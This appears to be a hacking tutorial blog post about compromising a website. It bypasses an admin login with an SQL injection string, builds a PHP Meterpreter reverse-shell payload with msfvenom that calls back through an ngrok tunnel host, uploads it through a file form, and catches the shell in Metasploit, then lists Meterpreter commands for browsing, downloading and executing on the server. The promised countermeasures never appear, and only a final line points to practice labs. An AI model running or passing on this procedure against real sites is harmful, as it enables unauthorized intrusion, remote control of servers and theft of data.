In a recent survey, only 15% of business owners saw security as a challenge when more than half had reported being hacked and of that, only 6% of small businesses don’t have anyone handling their online security.
More people have access to the internet than ever before. This has prompted many organizations to develop web-based applications that users can use online to interact with the organization. Poorly written code for web applications can be exploited to gain unauthorized access to sensitive data and web servers.
In this article, we will introduce you to web applications hacking technique and the counter measures you can put in place to protect against such attacks.
- A vulnerable website/application
- Ngrok – Secure tunnel
- Msfvenom and Msfconsole
Most web applications are hosted on public servers accessible via the Internet. This makes them vulnerable to attacks due to easy accessibility. The following are common web application threats.
- SQL Injection
- Denial of Service Attacks
- XSS Attacks
- CSRF Attacks
- File Inclusion Attacks
- Session/Cookie Hijacking
- Code Injection
In this practical scenario, we are going to hack the admin panel of a website through String based SQL Injection and then will try to upload a malicious exploit through a form via upload field and then will get the reverse connection in Meterpreter.
So first step to bypass the login panel via string based SQL Injection. SQL Injection is one of the most common web hacking technique and usually occurs when you ask a user for input, like username and password. A hacker can get easily access to user names and passwords in a database by simply inserting ‘or”=’ into the user name and password text box as shown below:
If you successfully bypass the login page with SQL code then in next step, you need to setup a ngrok tunnel service so that you can get the reverse connection of that website over Internet/WAN.
For this, you need to use ngrok.com, start by creating a simple account and download the package from the website according to your architecture.
After creating an account, you need to unzip the package with the command “unzip <package name>” and then install the authtoken as provided in above screenshot with command “./ngrok authtoken <your token>“.
Now start the TCP service of ngrok with port 4444 by typing “./ngrok tcp 4444“. You can choose any port depending upon your need.
The above command will give a local forwarding address which is tcp://0.tcp.ngrok.io with forwarding port number 18290 which accepts all remote requests and will forward to your localhost with same port i.e. 4444 which you used in first command while starting the ngrok tcp service.
So here in this case, your LHOST = 0.tcp.ngrok.io and your LPORT = 18290.
Now next step is create a malicious payload using msfvenom utility which is default installed in Kali Linux operating system.
Command: msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=18290 R > hack.php
Here -p stands for payload and R stands for Raw format.
Now your hack.php file is saved in your root location which you need to upload it to that hacked website via any internal form where browse functionality is there. So in above site, we successfully bypass the login panel and then by luck we found one php form with File Upload functionality where we successfully uploaded our malicious file into that server.
Now next step is to find the path of uploaded file, that you can easily find through “Index of /” dork. So here in this case, our file name is “150135111_hack.php“.
Once your payload got uploaded in remote server by any hacking technique, you need to run the metasploit framework and get the reverse connection. To start the metasploit framework, type “msfconsole” in your terminal.
So here we’ll use multi/handler exploit by typing “use exploit/multi/handler” in same terminal and the payload which we’ll use is “set payload php/meterpreter/reverse_tcp“.
Here you need to set your LHOST and LPORT, if you are using ngrok or any other tunnel service, then your LHOST address will always be 0.0.0.0 but if you are using this metasploit framework in LAN, then you need to put your local IP address which you can easily get it through by typing “ifconfig” in your terminal.
As soon as you run the exploit in metasploit and execute the hack.php in browser you’ll instantly get the reverse meterpreter connection over Internet.
Here in above screenshot, you can see, you’ve successfully entered into remote server. Type “ls” to list out all files in remote server.
The command “pwd” will gives you the current path where you’ve uploaded your malicious file.
Here are some list of command which you can easily use with meterpreter.
? – Help menu
background – Backgrounds the current session
bgkill – Kills a background meterpreter script
bglist – Lists running background scripts
bgrun – Executes a meterpreter script as a background thread
channel – Displays information or control active channels
close – Closes a channel
disable_unicode_encoding – Disables encoding of unicode strings
enable_unicode_encoding – Enables encoding of unicode strings
exit – Terminate the meterpreter session
get_timeouts – Get the current session timeout values
help – Help menu
info – Displays information about a Post module
irb – Drop into irb scripting mode
load – Load one or more meterpreter extensions
machine_id – Get the MSF ID of the machine attached to the session
migrate – Migrate the server to another process
quit – Terminate the meterpreter session
read – Reads data from a channel
resource – Run the commands stored in a file
run – Executes a meterpreter script or Post module
sessions Quickly – switch to another session
set_timeouts – Set the current session timeout values
sleep – Force Meterpreter to go quiet, then re-establish session.
transport – Change the current transport mechanism
use – Deprecated alias for ‘load’
uuid – Get the UUID for the current session
write – Writes data to a channel
cat – Read the contents of a file to the screen
cd – Change directory
checksum – Retrieve the checksum of a file
cp – Copy source to destination
dir – List files (alias for ls)
download – Download a file or directory
edit – Edit a file
getlwd – Print local working directory
getwd – Print working directory
lcd – Change local working directory
lpwd – Print local working directory
ls – List files
mkdir – Make directory
mv – Move source to destination
pwd – Print working directory
rm – Delete the specified file
rmdir – Remove directory
search – Search for files
upload – Upload a file or directory
portfwd – Forward a local port to a remote service
execute – Execute a command
getenv – Get one or more environment variable values
getpid – Get the current process identifier
getuid – Get the user that the server is running as
kill – Terminate a process
localtime – Displays the target system’s local date and time
pgrep – Filter processes by name
pkill – Terminate processes by name
ps – List running processes
shell – Drop into a system command shell
sysinfo – Gets information about the remote system, such as OS
You can even upload your malicious file via file inclusion attacks that we’ll discuss further.
Note: Be careful when you are using this attempt in live website, you can use any of the vulnerable machine like DVWA, bWAPP etc for testing and learning purposes.